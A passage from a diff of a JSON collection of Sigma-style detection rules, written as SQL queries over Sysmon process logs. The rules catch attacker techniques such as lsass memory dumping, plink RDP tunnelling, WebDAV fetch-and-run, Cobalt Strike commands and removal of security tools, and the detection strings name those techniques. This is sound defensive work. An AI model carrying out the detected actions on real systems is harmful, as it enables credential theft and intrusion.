CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", @@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine 